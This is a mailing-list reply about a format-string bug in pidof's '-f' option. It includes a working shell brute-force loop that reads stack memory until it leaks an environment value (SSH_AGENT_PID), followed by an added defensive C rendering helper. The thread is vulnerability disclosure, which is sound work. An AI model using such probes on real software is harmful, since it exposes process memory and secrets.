> What's the attack vector here (making this an exploit rather than
> "just" a bug)?

I didn't investigate too much, but with a trivial brute force I can add
%hhd at will until I dump what I need from the stack:

$ arg='[%d '; until ./pidof -f "$arg] mem: %s" pidof teststring |grep -q teststring; do arg="$arg %hhd"; done
$ ./pidof -f "$arg] mem: %s" pidof teststring
[30286 0 -128 0 48 -45 -1 0 -112 -128 0 0 0 -40 0 0 0 120 -32 7 72 7 -112 28 0 88 0 0 47 47 0 0 0 0 95 76 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 -48 8 -16 0 -96 116 8 -104 -16 -88 -92 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 -64 0 -64 8 5 0 0 -96 1 -43 0 0 -32 0 -64 -16 0 0 0 19 0 8 0 -64 0 -124 -16 0 0 0 -124 -124 0 0 0 56 80 10 0 0 -16 0 0 30 -8 -96 5 -56 -48 -45 11] mem: teststring

$ arg='[%d '; until ./pidof -f "$arg] mem: %s" pidof |grep -q SSH_AGENT_PID ; do arg="$arg %hhd"; done
$ ./pidof -f "$arg] mem: %s" pidof
[31295 0 -128 0 104 -49 -1 0 -112 -128 0 0 0 -40 0 0 0 120 32 7 72 7 -112 28 0 88 0 0 47 47 0 0 0 0 95 76 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 8 -16 0 -96 116 8 -104 -16 -24 -28 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 -64 0 -64 72 4 0 0 -96 1 -43 0 0 -32 0 -64 -16 64 0 0 19 0 72 0 -64 0 -60 -16 64 0 0 -60 -60 0 0 0 112 80 10 0 0 -16 64 0 30 56 -96 4 -60 -52 -49 22 0 28 39] mem: SSH_AGENT_PID=892

Probably someone more skilled and motivated than me can do much better
(or worse, depends).

> Wouldn't you need to have some process which was passing untrusted
> data directly to the `-f` argument, is that likely in the real world?
>
> Ian.

I hope not, but you can never know.

Regards,
-- 
Matteo Croce
per aspera ad upstream
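Added example, not code from the thread or from procps-ng: one defensive pattern for a user-controlled `-f` template is to render it in your own code, substituting only the placeholders you support, so the string never reaches the printf family and stray directives like %hhd have nothing to read. `render_template` and `renders_to` are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: render a user-supplied template ourselves.
 * Only "%d" (pid) and "%s" (name) are substituted and "%%" yields a
 * literal percent; any other directive (%hhd, %x, %n, flags, widths,
 * a trailing '%') is rejected. Placeholders may appear in any order
 * because each is matched by name, not by argument position.
 * Returns the rendered length, or -1 on a bad template or a buffer
 * that is too small. */
int render_template(char *out, size_t outsz, const char *fmt, int pid, const char *name)
{
    size_t w = 0;
    if (outsz == 0)
        return -1;
    for (const char *p = fmt; *p; p++) {
        int n;
        if (*p != '%') {                 /* ordinary character: copy it */
            if (w + 1 >= outsz)
                return -1;
            out[w++] = *p;
            continue;
        }
        p++;                             /* the conversion character */
        if (*p == 'd')
            n = snprintf(out + w, outsz - w, "%d", pid);
        else if (*p == 's')
            n = snprintf(out + w, outsz - w, "%s", name);
        else if (*p == '%')
            n = snprintf(out + w, outsz - w, "%%");
        else
            return -1;                   /* anything else is refused */
        if (n < 0 || (size_t)n >= outsz - w)
            return -1;                   /* truncated: refuse, don't clip */
        w += (size_t)n;
    }
    out[w] = '\0';
    return (int)w;
}

/* Check helper: 1 if fmt renders exactly to want, 0 otherwise. */
int renders_to(const char *fmt, int pid, const char *name, const char *want)
{
    char buf[128];                       /* constructed, fixed-size output */
    return render_template(buf, sizeof buf, fmt, pid, name) >= 0
        && strcmp(buf, want) == 0;
}
```

The same template the thread uses for the probe, "[%d %hhd] mem: %s", is rejected outright instead of reading past the supplied arguments.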